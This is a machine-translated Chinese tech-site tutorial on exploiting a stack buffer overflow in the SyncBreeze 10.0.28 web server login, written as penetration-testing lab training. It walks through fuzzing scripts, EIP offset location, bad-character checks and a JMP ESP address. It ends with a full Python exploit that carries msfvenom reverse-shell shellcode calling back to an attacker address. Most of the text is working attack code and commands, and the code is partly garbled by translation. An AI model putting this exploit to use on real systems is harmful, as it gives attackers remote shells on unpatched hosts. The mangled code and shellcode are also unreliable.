Shulou(Shulou.com)05/31 Report--

This article will explain in detail how to carry out the actual combat of syncbreeze in Windows Buffer Overflow. The content of the article is of high quality, so the editor will share it with you for reference. I hope you will have a certain understanding of the relevant knowledge after reading this article.

Environmental preparation

Kali virtual machine kali-linux-2020.4-vmware-amd64

Win10 virtual machine

Vulnerability program syncbreezeent_setup_v10.0.28.exe

Note that after startup, you need to check the web server option on the client side, and do not check the following two options

1. Write FUZZ scripts to locate vulnerabilities

Wireshark grabs the bag

The original tutorial used python2 to fuzz based on socket requests, and on the target machine to observe the state changes of registers and stacks through immunity debugger.

#! / usr/bin/python#-*-coding: utf-8-* import sockettry: print "\ nSending evil buffer..." Size = 800inputBuffer = "A" * size content = "username=" + inputBuffer + "& password=A" buffer = "POST / login HTTP/1.1\ r\ n" buffer + = "Host: 127.0.0.1\ r\ n" buffer + = "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0\ r\ n" buffer + = "Accept: text/html,application/xhtml+xml,application/xml Qimagination 0.9, Accept-Language image, webp, camera, etc.\ r\ n "buffer + =" Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en Qroom0.2\ r\ n "buffer + =" Referer: http://127.0.0.1/login\r\n" buffer + = "Connection: close\ r\ n" buffer + = "Content-Type: application/x-www-form-urlencoded\ r\ n" buffer + = "Content-Length:" + str (len (content)) + "\ r\ n" buffer + = "\ r\ n" buffer + = content s = socket.socket (socket.AF_INET) Socket.SOCK_STREAM) s.connect (("127.0.0.1", 80)) s.send (buffer) s.close () print "\ nDone!" except Exception as e: print "Could not connect!" Print e

Immunity debugger download link: ImmunityDebugger_1_85_setup.exe

Run as an administrator, the attach syncbrs process will be automatically paused and F9 will continue to run

Execute the above socket_fuzz.py script, and when the 800-byte buffer is sent, the debugger enters a paused state and the EIP is overwritten by 41414141.

Seeing that some students try to locate the buffer size of crash through http request timeout, the echo is more friendly.

Slightly modified according to the machine environment, the http_fuzz.py code is as follows:

Import requestssize = 100while (size < 2000): inputbuffer = "A" * size data = "username=" + inputbuffer + "& password=A" url = "http://192.168.67.150:80/login" header = {" Host ":" 192.168.67.150 Host 80 "," User-Agent ":" Mozilla/5.0 (X11; Linux x86 * 64) Rv:78.0) Gecko/20100101 Firefox/78.0 "," Accept ":" text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 "," Accept-Language ":" en-US,en " Qroom0.5 "," Accept-Encoding ":" gzip, deflate "," Referer ":" http://192.168.67.150:80/login", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded" "Content-Length": str (len (data))} # construct HTTP header try: print ("Try to send" + str (size)) res = requests.post (url=url, data=data, headers=header,timeout=3) # send a request to delay determining whether the port is reachable. Print ("Successful" + str (res.status_code)) size + = 100except Exception as e: print (e) print ("the program is dead") break

Personally, I think it is better to write fuzz and exp or to send tcp requests through the original socket. I will continue to use socket to send tcp requests below.

two。 Locate and control EIP

We use an 800-byte buffer, which is a string that does not repeat every four bytes of chunk generated under kali using "msf-pattern_create-l 800".

The locate_eip.py code is as follows:

#! / usr/bin/pythonimport sockettry: print "\ nSending evil buffer..." Size = 800inputBuffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah2Ah3Ah4Ah5Ah6Ah7Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba" content = "username=" + inputBuffer + "& password=A" buffer = "POST / login HTTP/1.1\ r\ n" buffer + = "Host: 127.0.0.1\ r\ n" buffer + = "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0\ r\ n" buffer + = "Accept: text/html,application/xhtml+xml,application/xml Qimagination 0.9, Accept-Language image, webp, camera, etc.\ r\ n "buffer + =" Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en Qroom0.2\ r\ n "buffer + =" Referer: http://127.0.0.1/login\r\n" buffer + = "Connection: close\ r\ n" buffer + = "Content-Type: application/x-www-form-urlencoded\ r\ n" buffer + = "Content-Length:" + str (len (content)) + "\ r\ n" buffer + = "\ r\ n" buffer + = content s = socket.socket (socket.AF_INET) Socket.SOCK_STREAM) s.connect (("127.0.0.1", 80)) s.send (buffer) s.close () print "\ nDone!" except Exception as e: print "Could not connect!" Print e

Locate on debugger that eip is overwritten by 42306142. The figure below is as follows

Use "sf-pattern_offset-l 800-Q 42306142" under kali to locate the address covered by EIP with an offset of 780.

It is also noticed that the value of register ESP is 2Ba3Ba4B. Overwrite, view 33614232 of the data stored in ESP in the stack, and the corresponding offset is 788.

3. Locate the entrance location and allocate space of the SHELLCODE

The payload size of the standard bounce shell is about 350-400 bytes, so we expanded the size of the buffer from 800 to 1500 bytes. First verify whether the large expansion of space will cause the change of the original stack overflow environment. The code is as follows:

#! / usr/bin/pythonimport sockettry: print "\ nSending evil buffer..." Size = 800filler = "A" * 780eip = "B" * 4offset = "C" * 4buffer = "D" * (1500-len (filler)-len (eip)-len (offset)) inputBuffer = filler + eip + offset + buffer content = "username=" + inputBuffer + "& password=A" buffer = "POST / login HTTP/1.1\ r\ n" buffer + = "Host: 127.0.0.1\ r\ n" buffer + = "buffer + =" User-Agent: Mozilla/5.0 (Windows NT 10.0 Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0\ r\ n "buffer + =" Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\ r\ n "buffer + =" Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en Qroom0.2\ r\ n "buffer + =" Referer: http://127.0.0.1/login\r\n" buffer + = "Connection: close\ r\ n" buffer + = "Content-Type: application/x-www-form-urlencoded\ r\ n" buffer + = "Content-Length:" + str (len (content)) + "\ r\ n" buffer + = "\ r\ n" buffer + = content s = socket.socket (socket.AF_INET) Socket.SOCK_STREAM) s.connect (("127.0.0.1", 80)) s.send (buffer) s.close () print "\ nDone!" except Exception as e: print "Could not connect!" Print e

Combined with the address of the register ESP and the value in the stack, it is found that the address of each stack overflow ESP is different, but the offset to the content is fixed. That is to say, the content that ESP points to is fixed in buffer. This location can be used as the starting address of the shellcode.

4. Locate bad characters

Buffer overflow determines the problem of bad characters before constructing the shellcode to prevent the incoming string from being truncated. We populated payload with 256 hexadecimal values from 0x01 to 0xff and repeatedly checked for bad characters until all hexadecimal values were populated in the buffer. The code is as follows:

#! / usr/bin/pythonimport socket# "0x00, 0x0A, 0x0D, 0x25, 0x26, 0x2B And 0x3D "#"\ x00\ x0a\ x0d\ x25\ x26\ x2b\ x3d "badchars = ("\ x01\ x02\ x03\ x04\ x05\ x06\ x07\ x08\ x09\ x0a\ x0b\ x0c\ x0d\ x0e\ x0f\ x10 ""\ x11\ x12\ x13\ x14\ x15\ x16\ x17\ x18\ x19\ x1a\ x1c\ x1d\ x1e\ x1f\ x20 ""\ x21\ x22\ x23\ x24\ x25\ x26\ x27\ x28 \ x29\ x2a\ x2b\ x2d\ X2e\ x2f\ x30 ""\ X31\ X32\ x33\ x34\ x36\ x37\ x38\ x39\ x3a\ X3b\ X3c\ X3d\ X3f\ x40 ""\ X41\ x42\ x43\ x44\ x45\ x46\ x48\ x49\ x4a\ x4c\ x4d\ x4e\ x4f\ x50 "\ x51\ x52\ x53\ x54\ x55\ x56\ x58 \ x59\ x5a\ x5b\ x5d\ x5e\ x5f\ x60 "\ x61\ x62\ x63\ x64\ x65\ x67\ x68\ x69\ x6a\ x6b\ x6c\ x6d\ x73\ x74\ x76\ x77\ x78\ x79\ x7a\ x7c\ x7d\ x7f\ x80"\ x81\ x82\ x83\ x84\ x85\ x87\ x88 \ x89\ x8a\ x8b\ x8c\ x8d\ x8e\ x8f\ x90 ""\ x91\ x92\ x93\ x94\ x96\ x97\ x98\ x99\ x9a\ x9b\ X9c\ X9d\ X9e\ xa5\ xa6\ xa7\ xa8\ xa9\ xab\ xac\ xad\ xae\ xaf\ xb0 "\ xb1\ xb2\ xb3\ xb4\ xb5\ xb6\ xb7\ xb8 \ xb9\ xba\ xbb\ xbc\ xbd\ xbe\ xbf\ xc0 ""\ xc1\ xc2\ xc3\ xc4\ xc5\ xc6\ xc7\ xc8\ xc9\ xca\ xcb\ xcc\ xcd\ xce\ xcf\ xd0 "\ xd1\ xd2\ xd3\ xd4\ xd5\ xd6\ xd8\ xd9\ xda\ xdb\ xdc\ xdd\ xdd\ xdd"\ xde\ \ xe9\ xea\ xeb\ xec\ xed\ xee\ xef\ xf0 "\ xf1\ xf2\ xf3\ xf4\ xf5\ xf6\ xf7\ xf8\ xf9\ xfa\ xfb\ xfc\ xfd\ xfe\ xff") try: print "\ nSending evil buffer..." Filler = "A" * 780 eip = "B" * 4 offset = "C" * 4 inputBuffer = filler + eip + offset + badchars content = "username=" + inputBuffer + "& password=A" buffer = "POST / login HTTP/1.1\ r\ n" buffer + = "Host: 127.0.0.1\ r\ n" buffer + = "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Rv:84.0) Gecko/20100101 Firefox/84.0\ r\ n "buffer + =" Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\ r\ n "buffer + =" Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en Qroom0.2\ r\ n "buffer + =" Referer: http://127.0.0.1/login\r\n" buffer + = "Connection: close\ r\ n" buffer + = "Content-Type: application/x-www-form-urlencoded\ r\ n" buffer + = "Content-Length:" + str (len (content)) + "\ r\ n" buffer + = "\ r\ n" buffer + = content s = socket.socket (socket.AF_INET) Socket.SOCK_STREAM) s.connect (("127.0.0.1", 80)) s.send (buffer) s.close () print "\ nDone!" except Exception as e: print "Could not connect!" Print e

After sending, right-click ESP in immunity debugger, select follow in dump and check the value of this segment of buffer in memory. It is found that 0x0A is not displayed, which means it is a bad character. After removing the 0x0A from the script, repeat this action until you find all the bad characters. The final bad character is: 0x00rect 0x0A reel 0x0D meme 0x25pr 0x26pr 0x3D

5. Reliable memory address of location instruction JMP ESP

The choice of JMP ESP needs to meet two conditions:

First, the lib library must be a static library, to avoid the impact of ASLR, SafeSEH,ASLR,NXCompat (DEP protection) and other memory protection technologies are disabled.

Second, the address should not contain bad characters because it will be part of our buffer.

Shellcode can be stored in the memory space pointed to by the ESP address, and after execution, the program will execute the code of the memory space pointed to by ESP, that is, our shellcode. Therefore, you need to overwrite the value of EIP with the address of the instruction JMP ESP, and the opcode corresponding to JMP ESP is 0XFFE4. It can be obtained through the msf-nasm_shell that comes with kali.

Through the! mona modules function of immunity debugger, you can see the memory address of the loaded lib library, select those that meet the above two conditions, and find that libspp is appropriate. Use! mona find-s "\ xff\ xe4"-m "libspp.dll" to get the address of JMP ESP as 0x10090c83, as shown in the following figure:

Because x86 and amd64 use small-end mode, the low address in memory stores low bytes and the high address stores high bytes.

0x10090c83 is a memory address. When it is written into memory as a value, 0x10 will be placed at the high address and 0x83 at the low address. When it is read to the EIP register by CPU, CPU reads to 0x83 first, and the final address is read in reverse.

So we should store the return address in reverse.

In a word, when the memory address is passed to the register as an argument, it is passed in reverse order. The code after the modification of eip is as follows:

#! / usr/bin/pythonimport sockettry: print "\ nSending evil buffer..." Size = 800filler = "A" * 780eip = "\ x83\ x0c\ x09\ x10" offset = "C" * 4 buffer = "D" * (1500-len (filler)-len (eip)-len (offset)) inputBuffer = filler + eip + offset + buffer content = "username=" + inputBuffer + "& password=A" buffer = "POST / login HTTP/1.1\ r\ n" buffer + = "Host: 127.0.0.1\ r\ n" Buffer + = "User-Agent: Mozilla/5.0 (Windows NT 10.0) Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0\ r\ n "buffer + =" Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\ r\ n "buffer + =" Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en Qroom0.2\ r\ n "buffer + =" Referer: http://127.0.0.1/login\r\n" buffer + = "Connection: close\ r\ n" buffer + = "Content-Type: application/x-www-form-urlencoded\ r\ n" buffer + = "Content-Length:" + str (len (content)) + "\ r\ n" buffer + = "\ r\ n" buffer + = content s = socket.socket (socket.AF_INET) Socket.SOCK_STREAM) s.connect (("127.0.0.1", 80)) s.send (buffer) s.close () print "\ nDone!" except Exception as e: print "Could not connect!" Print e

After running the script, the breakpoint under the 0X10090C83 of debugger is displayed as follows:

6. Generate SHELLCODE and complete exploit

Use msfvenom that comes with kali, use encoder shikata_ta_nai to avoid bad characters, and use EXITFUNC=thread to avoid program crashes

Msfvenom-p windows/shell_reverse_tcp LHOST=192.168.67.148 LPORT=443 EXITFUNC=thread-f c-e x86/shikata_ga_nai-b "\ X00\ x0a\ x0d\ x25\ x26\ x2b\ X3D"

Use 10 NOP (0X90) to avoid memory rewriting near the top of the stack brought by the decoder.

The code is as follows:

#! / usr/bin/pythonimport sockettry: print "\ nSending evil buffer..." Shellcode = ("\ xdd\ xc1\ xbb\ x6b\ x94\ x1e\ xe1\ xd9\ x74\ x24\ xf4\ x5d\ x33\ xc9\ xb1"\ x52\ x31\ x5d\ x17\ x83\ xc5\ x04\ x03\ x36\ xfc\ x14\ x34\ x82 "\ xd7\ xc4\ x90\ xe3\ x5e\ x21\ xa1\ x23\ x04\ X92\ x93\ x4e\ x66\ x1f"\ x5f\ x02\ x92\ x94\ x2d\ x8b\ x95\ x9d\ xed \ x98\ x9e\ xb0\ xce\ xbb "\ x1c\ xcb\ x02\ x1c\ x04\ x5a\ x59\ x79\ x9a\ x0e\ x32\ xf5\ x09"\ xbe\ x37\ x92\ x35\ x0b\ x45\ x92\ xaa\ x64\ xb3\ x7d\ x56\ x3f "\ x13\ x7c\ xbb\ x4b\ x1a\ x66\ xd8\ x76\ xd4\ x1d\ x2a\ x0c\ xe7\ xf7\ x62"\ xed\ x44\ x36\ x4b\ x3f " \ x7f\ x6c\ xff\ xe3\ x89\ x8e\ x82\ xf3\ X4e ""\ xec\ X58\ x71\ x54\ x56\ x2a\ x21\ xb0\ x66\ xff\ xb4\ x33\ x64\ xb4\ xb3 "\ x1b\ x69\ x4b\ x17\ x10\ xc0\ x96\ xf6\ x92\ xbc\ xd2\ x44\ x44"\ xdc\ x43\ x21\ x27\ xe1\ x93\ x8a\ x98\ x47\ xd8\ x27\ xf5\ x83\ x2f" \ x3b\ xb0\ x2d\ X4F\ X48\ x82\ xf2\ xfb\ xc6\ xae\ x7b\ x22\ x11 "\ xd0\ X51\ x92\ x8d\ X2f\ x5a\ xe3\ x84\ xeb\ X0e\ xb3\ xda\ x2e\ x58"\ X3e\ xe2\ xfa\ xcf\ x4c\ x55\ xb0\ xde\ X05\ x58\ x34\ xa3\ x7a ""\ X78\ X37\ x69\ x13\ xc2\ xfa\ xdc\ x4c\ X8F\ X6e\ xb4\ x7a " \ x8e "\ xfe\ x06\ xe9\ xfa\ x10\ x4f\ xa2\ x92\ x89\ xca\ x38\ x02\ x55\ xc1\ x45"\ x04\ xdd\ xe6\ xba\ xcb\ x16\ x82\ xa8\ xd6\ xd9\ x92\ x6b\ xe8\ xf7 "\ xba\ xf0\ x7b\ x9c\ x7e\ x60\ X0b\ x6d\ xd7\ x56\ x42\ xfb\ xc5\ xc1"\ xfc\ x19\ X97\ xc7\ x99\ x64 xc9\ x20 \ x81\ xd1\ xed\ x32\ x5f "\ xd9\ xa9\ x66\ X0f\ X8c\ X67\ xd0\ xe9\ x66\ xc6\ xa3\ xd5\ x80\ x5a"\ x35\ x16\ x13\ x3a\ x73\ xe5\ xc0\ X78\ X59\ xff\ x24\ xbb\ x34 "\ X78\ X59\ x5b\ xba\ X53\ x7b\ x59\ x71\ x14 xc4\ X10\ x95\ x79"\ xf7\ xcf\ xda\ x74\ xe5 \ xa2\ x73\ x64\ x8c\ xa7\ x38\ x22\ x7d\ xda ""\ x51\ xc7\ x81\ x49\ x51\ xc2 ") size =" A "* 780 eip =" A "* 780 eip ="\ x83\ x0c\ x09\ x10 "offset =" C "* 4 nops ="\ x90 "* 10 inputBuffer = filler + eip + offset + nops + shellcode content =" username= "+ inputBuffer +" & password=A "buffer =" POST / login HTTP/1.1\ r\ n "buffer + =" Host: 192.168.67.150\ r\ n "buffer + =" User-Agent: Mozilla/5.0 (Windows NT 10.0 Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0\ r\ n "buffer + =" Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\ r\ n "buffer + =" Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en Qroom0.2\ r\ n "buffer + =" Referer: http://192.168.67.150/login\r\n" buffer + = "Connection: close\ r\ n" buffer + = "Content-Type: application/x-www-form-urlencoded\ r\ n" buffer + = "Content-Length:" + str (len (content)) + "\ r\ n" buffer + = "\ r\ n" buffer + = content s = socket.socket (socket.AF_INET) Socket.SOCK_STREAM) s.connect (("192.168.67.150", 80)) s.send (buffer) s.close () print "\ nDone!" except Exception as e: print "Could not connect!" Print e

Successful getshell

Use the tool to summarize:

Kali:wireshark

Windows:immunity debugger

Kali:msf-pattern_create,msf-pattern_offset

Python:

Get badchars: https://github.com/cytopia/badchars

The debugger plug-in mona:https//github.com/corelan/mona is placed under C:\ Program Files (x86)\ Immunity Inc\ Immunity Debugger\ PyCommands with the command! mona modules,! mona find-s "\ xff\ xe4"-m "libspp.dll"

Kali:msf-nasm_shell, msfvenom

Msfvenom-p windows/shell_reverse_tcp LHOST=192.168.67.148 LPORT=443 EXITFUNC=thread-f c-e x86/shikata_ga_nai-b "\ X00\ x0a\ x0d\ x25\ x26\ x2b\ X3D"

On how to carry out syncbreeze in Windows Buffer Overflow to share the actual combat here, I hope that the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.